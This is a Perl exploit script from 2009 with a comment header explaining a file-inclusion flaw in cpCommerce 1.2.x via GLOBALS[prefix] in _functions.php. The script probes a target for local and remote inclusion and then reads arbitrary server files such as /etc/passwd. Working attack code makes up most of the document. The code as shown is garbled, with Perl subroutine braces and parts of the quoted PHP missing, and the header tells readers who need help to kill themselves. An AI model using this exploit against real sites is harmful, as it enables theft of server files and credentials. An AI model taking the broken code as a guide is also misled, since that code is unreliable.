# cpCommerce 1.2.x GLOBALS[prefix] Arbitrary File Inclusion Exploit
# by staker
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# mail: staker[at]hotmail[dot]it
# url: http://cpcommerce.cpradio.org
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# it works with register_globals=on
# if you wanna carry out a LFI -> mq=off 
# short explanation:
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# cpCommerce contains one flaw that allows an
# attacker to include a remote or local file
# because of require_once() in _functions.php
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# File _functions.php
#  [begin block code] 
#  ------------------
#  define("CPCOMMERCE_LOADED", true);
#  ini_set("register_globals",0);     <------ {1} totally useless
#  error_reporting(E_ALL ^ E_NOTICE);
#  // Older PHP Versions
#  if (phpversion() < "4.0.6" && isset($HTTP_POST_VARS))
#    $_POST = ($HTTP_POST_VARS);
#  if (phpversion() < "4.0.6" && isset($HTTP_GET_VARS))
#    $_GET = ($HTTP_GET_VARS);
#  if (phpversion() < "4.0.6" && isset($HTTP_COOKIE_VARS))
#  if (phpversion() < "4.0.6" && isset($HTTP_SERVER_VARS))
#  if (phpversion() < "4.0.6" && isset($HTTP_POST_FILES))
#  if (phpversion() < "4.0.6" && isset($HTTP_SESSION_VARS))
# // Start MySQL and Sessions
# session_start();
#  // Resolve PHP running under fcgi
#  if (empty($_SERVER['PHP_SELF']))
#  ## Protect prefix vulnerability
#  if (strpos($_SERVER['PHP_SELF'],"_functions.php") !== false)
#                   header("Location: {$_SERVER['HTTP_HOST']}"); <------ {2} exit or die function?
#  if (!isset($prefix) || isset($_REQUEST['prefix'])) $prefix = ""; <--- {3} this is interesting
# ## Include Configuration Files
# require_once("{$prefix}_config.php"); <-------- {4} include $prefix variable + _config.php
# ----------------
# [end block code] 
# Explanation (code snippet above [points]) 
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# 1. actually ini_set() doesn't work..so doesn't change anything
# 2. header() needs an exit or die function otherwise is useless
# 2. because of header() without die we bypass the direct access
# 3. all REQUEST variables are not allowed,what about GLOBALS[]?
# 4. require_once() include $prefix variable.
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# It's not possible to include a remote/local file using a web
# browser because you will be automatically redirected in another
# page ($_SERVER['HTTP_HOST']). What about scripts or curl? yeah
# http://[target]/[path]/_functions.php?GLOBALS[prefix]=[FILE]
# Various:
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# They didn't help me but i wanna give a thanks to girex,str0ke
# Gianluka_95,p3ri0d,mrdoktom,Aquilo & http://zeroidentity.org
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Don't contact me on messenger,i'm bored of stupid questions!
# so if you wanna help about exploit usage. kill yourself ok?
# I didn't contact anyone to fix this bug, at least not yet,
# but i release a possible fix here:
# _functions.php line: 36 Replace it with the following code: 
# die(header("Location: http://{$_SERVER['HTTP_HOST']}")); 
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 
# Today is: 23 May 2009. 
# Location: Italy,Turin.
# http://www.youtube.com/watch?v=TmFi2snLr7o
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

use LWP::UserAgent;

print "[*--------------------------------------------------------------*]\n".
      "[* cpCommerce 1.2.x GLOBALS[prefix] Arbitrary Inclusion Exploit *]\n".
      "[* Usage: ./cpCommerce.pl [target]/[path] [filename] [proxy]    *]\n".
      "[* [proxy] is optional ex:                    *]\n".

die "Example: localhost/cpcommerce /etc/passwd\n" unless @ARGV; 
my $host = $ARGV[0];
my $type = $ARGV[1];

my $expl = new cpCommerce;

print $expl->vulnerable($host);
print $expl->local_file($host,$type);

package cpCommerce;

sub new
        my $class = shift;
        my $self = {};
        $self->{vulnerable} = undef;
        $self->{parse_url}  = undef;
        $self->{local_file} = undef;
        return $self;

sub vulnerable
        my ($class,$host) = @_; 
        my $www = new LWP::UserAgent(
                                      max_redirect => 0,
                                      agent        => 'ELinks/0.9.3 (textmode; Linux 2.6.11 i686; 79x24)',
                                    ) || die $!;
        if ($ARGV[2] =~ /^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}?$/) {
               $www->proxy(['http', 'ftp'], $class->parse_url($ARGV[2]));
        $host = $class->parse_url($host);
        my $exter = $www->get($host.'/_functions.php?GLOBALS[prefix]=http://');    
        my $local = $www->get($host.'/_functions.php?GLOBALS[prefix]=%00');
        my @check = ();
        push(@check,'LFI') unless $local->content =~ /0_config.php'/i;
        push(@check,'RFI') unless $exter->content =~ /URL file-access is disabled/i;
        if (scalar(@check) == 0) {
              return "Site not vulnerable because of php.ini settings.\n";
        else {
              return "Vulnerable to: ${check[0]} ${check[1]}\n";

sub local_file
       my ($class,$host,$file) = @_;
       my $www = new LWP::UserAgent(
                                     max_redirect => 0,
                                     agent        => 'Lynxy/6.6.6dev.8 libwww-FM/3.14159FM',
                                   ) || die $!;  
       if ($ARGV[2] =~ /^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}?$/) {
               $www->proxy(['http', 'ftp'], $class->parse_url($ARGV[2]));
       $host = $class->parse_url($host);
       my $request = $www->get($host.'/_functions.php?GLOBALS[prefix]='.$file.'%00');
       my $result;
       if ($request->status_line =~ /^302|200|301/ || $request->is_success) 
              if ($request->content =~ /Failed opening/i) {
                    return "Exploit failed.\n";
              else {
                    my @result = split /No database selected/,$request->content;
                    return $result[0];
              if ($request->as_string !~ /(ecommerce|oscommerce)/i) {
                    return "cpCommerce not found\n";
              else {

sub parse_url
        my ($class,$string) = @_;
        if ($string !~ /^http:\/\/?/i) {
                $string = 'http://'.$string;
        return $string;